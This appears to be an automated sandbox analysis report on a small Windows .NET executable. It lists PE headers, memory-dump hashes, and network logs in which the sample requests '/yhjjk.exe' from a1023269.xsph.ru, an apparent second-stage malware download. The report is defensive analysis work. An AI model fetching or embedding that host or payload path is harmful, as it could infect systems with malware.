    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    add byte ptr [eax], al
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x3b9c0x4f.text
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x59c.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x3b040x38.text
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x20000x1bf40x1c007c89af30666e345211fc377e360b72feFalse0.5285993303571429data5.6379279004679015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rsrc0x40000x59c0x6000b78bc6fe33ebe5b1c71e7d24344f82fFalse0.416015625data4.050448072694083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc0x60000xc0x200043af4dda3dac06b3cecf8c7c1b3a656False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountryZLIB Complexity
    RT_VERSION0x40900x30cdata0.43205128205128207
    RT_MANIFEST0x43ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
    DLLImport
    mscoree.dll_CorExeMain
    TimestampSource PortDest PortSource IPDest IP
    Sep 4, 2024 14:11:03.612879992 CEST4970480192.168.2.5141.8.197.42
    Sep 4, 2024 14:11:03.617821932 CEST8049704141.8.197.42192.168.2.5
    Sep 4, 2024 14:11:03.617923021 CEST4970480192.168.2.5141.8.197.42
    Sep 4, 2024 14:11:03.653024912 CEST4970480192.168.2.5141.8.197.42
    Sep 4, 2024 14:11:03.657869101 CEST8049704141.8.197.42192.168.2.5
    Sep 4, 2024 14:11:04.289000034 CEST8049704141.8.197.42192.168.2.5
    Sep 4, 2024 14:11:04.289021015 CEST8049704141.8.197.42192.168.2.5
    Sep 4, 2024 14:11:04.289253950 CEST4970480192.168.2.5141.8.197.42
    Sep 4, 2024 14:11:04.301188946 CEST4970480192.168.2.5141.8.197.42
    Sep 4, 2024 14:11:04.306001902 CEST8049704141.8.197.42192.168.2.5
    TimestampSource PortDest PortSource IPDest IP
    Sep 4, 2024 14:11:03.377177954 CEST6539953192.168.2.51.1.1.1
    Sep 4, 2024 14:11:03.465123892 CEST53653991.1.1.1192.168.2.5
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Sep 4, 2024 14:11:03.377177954 CEST192.168.2.51.1.1.10x6957Standard query (0)a1023269.xsph.ruA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Sep 4, 2024 14:11:03.465123892 CEST1.1.1.1192.168.2.50x6957No error (0)a1023269.xsph.ru141.8.197.42A (IP address)IN (0x0001)false
    • a1023269.xsph.ru
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.549704141.8.197.42802944C:\Users\user\Desktop\01US71QGnu.exe
    TimestampBytes transferredDirectionData
    Sep 4, 2024 14:11:03.653024912 CEST75OUTGET /yhjjk.exe HTTP/1.1
    Host: a1023269.xsph.ru
    Connection: Keep-Alive
    Sep 4, 2024 14:11:04.289000034 CEST303INHTTP/1.1 400 Bad Request
    Server: openresty
    Date: Wed, 04 Sep 2024 12:11:04 GMT
    Content-Type: text/html
    Content-Length: 154
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:08:11:02
    Start date:04/09/2024
    Path:C:\Users\user\Desktop\01US71QGnu.exe
    Wow64 process (32bit):true
    Commandline:"C:\Users\user\Desktop\01US71QGnu.exe"
    Imagebase:0x2c0000
    File size:9'728 bytes
    MD5 hash:4505703B220FA0679096C65FEFB6D832
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    Target ID:1
    Start time:08:11:02
    Start date:04/09/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6d64d0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Reset < >
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID: K5o
      • API String ID: 0-2867487092
      • Opcode ID: 83b610716259c87eb7ff2dad7fc0a130cca13d42b380425c9dd6dcdefaf7bb1f
      • Instruction ID: 3556f1776a19ea227b9e270758be928172149c45bc876dbdffbced65dd686dab
      • Opcode Fuzzy Hash: 83b610716259c87eb7ff2dad7fc0a130cca13d42b380425c9dd6dcdefaf7bb1f
      • Instruction Fuzzy Hash: 674168B1D0024C9FCB14CFA9D980AEEBFF1EF48314F248469E519AB250DB749945CBA0
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5fd6cb3d5c989c278131b850738c2f3ee97f48a4e25822921085ab82c66659f6
      • Instruction ID: 63eb29058ec30b4ef748923608c1bd16aa105c956b6cc92aa4699c50fd37b884
      • Opcode Fuzzy Hash: 5fd6cb3d5c989c278131b850738c2f3ee97f48a4e25822921085ab82c66659f6
      • Instruction Fuzzy Hash: D4712875A002598FCB05DFA8C4849DDBBF2AF89320F198195D445EB3B5DB349D86CB60
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f19553755874fe90999c4040450c16686878a47e61eb709b61e3fb528413a247
      • Instruction ID: 6ecedd5e24dc085da8ed90a22636e65811a1daf1bdce2ea112abce0c661b544a
      • Opcode Fuzzy Hash: f19553755874fe90999c4040450c16686878a47e61eb709b61e3fb528413a247
      • Instruction Fuzzy Hash: ED414671E10219DFDB19CFA8D844ADDBBF2FF89310F188169E401AB3A1DB74A845CB91
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: b14a7a741beaa6adc61b59c31ee568f6db2ec31ccb789a47d5e209a34be25413
      • Instruction ID: 3ce43568fccd2a63b44da397484b246c33984ff8fd55d30992cf38baef78df3c
      • Opcode Fuzzy Hash: b14a7a741beaa6adc61b59c31ee568f6db2ec31ccb789a47d5e209a34be25413
      • Instruction Fuzzy Hash: F4316F31E102199FDB08CFA8D854ADDBBF2FF89300F08855AE401AB3A1DB749945CB91
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d671324816f8e0480cbf3a2c22b4877e697829e3c4d2dd48748732e6aaddaaf9
      • Instruction ID: 163ae5ef475001de06d1a3e3d9d74f0df3be232a0b8ff488e204b925bb7786ef
      • Opcode Fuzzy Hash: d671324816f8e0480cbf3a2c22b4877e697829e3c4d2dd48748732e6aaddaaf9
      • Instruction Fuzzy Hash: 0A3137B0D0024CAFDB14CFA9C580AEEBFF5AF49344F248469E919AB350DB749945CFA0
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5699d45146aff86a8a1b72e395f17a9af6b26768f622aa9ed09164abee2409f8
      • Instruction ID: 83a11a5341127a2fc94159f1d00b5190191ba732cae6b62caa85f9cb8a0d0348
      • Opcode Fuzzy Hash: 5699d45146aff86a8a1b72e395f17a9af6b26768f622aa9ed09164abee2409f8
      • Instruction Fuzzy Hash: A721E172E001099FCB09EFA4C5905AEBBF2EFC9710F14806BD446AB354DB71AD42CB90
      Memory Dump Source
      • Source File: 00000000.00000002.3016018745.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_a8d000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 60ce3f909e315ea17bd9cbccad0faa680ee5b7c78b7a4e1548b132afed3d052b
      • Instruction ID: 527955ae3ba5a52e9d110544bc70456cb1ecafa76342d9208d6106380025f8a7
      • Opcode Fuzzy Hash: 60ce3f909e315ea17bd9cbccad0faa680ee5b7c78b7a4e1548b132afed3d052b
      • Instruction Fuzzy Hash: 7D01A231004344AAE720AB19D984B66BFACEF46364F18C42AED094A2D6C2799840CB71
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 269f6346bf90df30923561ea176cfb9ae9d76a3b7fa8993a6b0270b592407dda
      • Instruction ID: 24f5af3e95dc2fc2f4cdd2be00576e9d315fa3701418abf801b962d15d6b0db6
      • Opcode Fuzzy Hash: 269f6346bf90df30923561ea176cfb9ae9d76a3b7fa8993a6b0270b592407dda
      • Instruction Fuzzy Hash: FB01D432D0564A9FCB02CBB8ED104DDBB729FCA310F264316D101B71A0EB70264BCB51
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: f99e52aac2b22844ed7eb1aaa6507fae5016b19f9f85218e5bde5408ec20eeae
      • Instruction ID: 4eeefc93dac1cfc7d78ce7175a286fbc365bf006ccfcfbe4d4f34c66798190f9
      • Opcode Fuzzy Hash: f99e52aac2b22844ed7eb1aaa6507fae5016b19f9f85218e5bde5408ec20eeae
      • Instruction Fuzzy Hash: DD01F132D1420A9BCB04DBA8DC408DDFBB2EFCA300F154667D101770A0EB70254ACB90
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 709aaa81b490a2402d48bd5f190eb2673b1ad76f5bf81623ba5758881b30b35d
      • Instruction ID: 835f9635e1222d2fc8b42e04064c0874936e785f49fcf58227611c0adb35c150
      • Opcode Fuzzy Hash: 709aaa81b490a2402d48bd5f190eb2673b1ad76f5bf81623ba5758881b30b35d
      • Instruction Fuzzy Hash: E4F02236D101499BDF15D774C8659EFBFB29FC9300F05846AC402AB290DEB0690B8A92
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: a74d386bfdb8b66791601ab8cc88a029183c3cad651fd5dea98feb61fb40042e
      • Instruction ID: 755a769756fe99335142762afd769a1ab5b34013ef1a5c749785ba78d416eaa4
      • Opcode Fuzzy Hash: a74d386bfdb8b66791601ab8cc88a029183c3cad651fd5dea98feb61fb40042e
      • Instruction Fuzzy Hash: 87018132D1061F97CB04DBA9DC444DDF7B6EFCA311F114626E11177160EB71294ACB91
      Memory Dump Source
      • Source File: 00000000.00000002.3016018745.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_a8d000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 567f6209a2a382f806595c96ee617c12daf86524ac88791abd5620d571f2d586
      • Instruction ID: 82c99546ca847be2057633d259243a97bb20927c3980196d3fa124b189d24c4c
      • Opcode Fuzzy Hash: 567f6209a2a382f806595c96ee617c12daf86524ac88791abd5620d571f2d586
      • Instruction Fuzzy Hash: 18F06D71404344AEE7209B1AD884B66FFA8EF56728F18C45AEE484B296C2799C44CBB1
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 4b7c364b6f2b2e18d0738854b7598d15d328213730cc2375c945cb94b8a01df1
      • Instruction ID: 6c705f849b238ae24999f1c8e1e6398625cd54e77193a7e369f119f40a2a44e3
      • Opcode Fuzzy Hash: 4b7c364b6f2b2e18d0738854b7598d15d328213730cc2375c945cb94b8a01df1
      • Instruction Fuzzy Hash: B6F0C232D1014A9BDF15EB74C469AEFFFB29F85300F14852EC402A7285DEB06907CA82
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 7f4c45cfb74dee2ee75eb76721bba31255769e2010c193455cb1fbf54a08012e
      • Instruction ID: fd51f28fcbb4dd65e077810b2c94ae9f19be63dc8842bd9c44466709758d2f11
      • Opcode Fuzzy Hash: 7f4c45cfb74dee2ee75eb76721bba31255769e2010c193455cb1fbf54a08012e
      • Instruction Fuzzy Hash: 8CF0E932D1010D9BEF15D764C4555EFBBB69F84300F05442AD012BB240DEB06907C6D2
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 99bb27043f832287887d61819fb62f09d045b202b2070ebbea88a661936ea9ef
      • Instruction ID: 1e2381a3db98efde98ab0cf4da514f5d8eeab65bfbb45cda32719c73734078ce
      • Opcode Fuzzy Hash: 99bb27043f832287887d61819fb62f09d045b202b2070ebbea88a661936ea9ef
      • Instruction Fuzzy Hash: 97F03975B402158FCB08EF78C5148ACBBF1AFC822170585A9D00ACB376DA349D46CB21
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: e530673577b0cc9fa2c9f32638688fdbca21733896f6bdbeca01671d4b30d03e
      • Instruction ID: 887d13bbe4c06d9b4e5e6927d9d85130fec60606278a36f56cd54d6f974df6c1
      • Opcode Fuzzy Hash: e530673577b0cc9fa2c9f32638688fdbca21733896f6bdbeca01671d4b30d03e
      • Instruction Fuzzy Hash: 46E0D871E092849FDB11CBB4CA057ED3FB09B46340F2401DAE484CB295D6308D01CB52
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ce6259ef140980341ba09af620b58bbdb09b1e7812f436df9335ac0b8b1fc3b6
      • Instruction ID: 58e3a2943148f17bf6bb17e090286b75b382231358483099a102ba217a82e847
      • Opcode Fuzzy Hash: ce6259ef140980341ba09af620b58bbdb09b1e7812f436df9335ac0b8b1fc3b6
      • Instruction Fuzzy Hash: 9BD017B1D05208AFDB01CFE4CA0576D7BB8AB45241F214496E448CB255DA319E11C791
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 6f254e1607a2f34067bfa11a59648e25fbdce91cc558a378615f3ae6ae9cfeb1
      • Instruction ID: 040a1a504e8c8b58b52952c79eea6cea93d7100e3bca8a36b976c43117ee9363
      • Opcode Fuzzy Hash: 6f254e1607a2f34067bfa11a59648e25fbdce91cc558a378615f3ae6ae9cfeb1
      • Instruction Fuzzy Hash: 6DD05E36E0120C8FCB18DFA8D9404ECBBB5EFC8231B1481B6C119A7274C6348D52C761
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: bee34a375b66001ff782e9eb778611ace8252f46ad4787a21c9631aeece5cae4
      • Instruction ID: 5fbd7cb5922fa438a110a6121076ff38e6d060d2607a1002f481b1b1a9f6a72e
      • Opcode Fuzzy Hash: bee34a375b66001ff782e9eb778611ace8252f46ad4787a21c9631aeece5cae4
      • Instruction Fuzzy Hash: 4BD0A932B402198FCB148BB8E8004DC7BA4DAC0231B0002A6C119832B1C6708866C322
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 10a01b0e84ab7a34fa183850e7218bdfaf4cdd5e7f5e5573275538b146edb5f8
      • Instruction ID: 4f8ddd4520cd1197b3e946cae0c89b857be6062f2252d3e632e319b9ba8544ae
      • Opcode Fuzzy Hash: 10a01b0e84ab7a34fa183850e7218bdfaf4cdd5e7f5e5573275538b146edb5f8
      • Instruction Fuzzy Hash: 0DD0A732A012098FCF04CFE4D8046ECB7B0EBC4231F1401A6C115632A0C3344E86C761
      Memory Dump Source
      • Source File: 00000000.00000002.3016272891.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_26d0000_01US71QGnu.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: d8e1472c226938aa60300233acdebf9724c0cd46a552f39b050408ddb063c1f7
      • Instruction ID: 20170db9a7de3bed1344d5e86066460b2ff85ccb4db28be0ec0f6756a00a8419
      • Opcode Fuzzy Hash: d8e1472c226938aa60300233acdebf9724c0cd46a552f39b050408ddb063c1f7
      • Instruction Fuzzy Hash: D0B01236E4001CC5CF00CBD4F0003ECBB74E780336F000063C20C628008330026586D2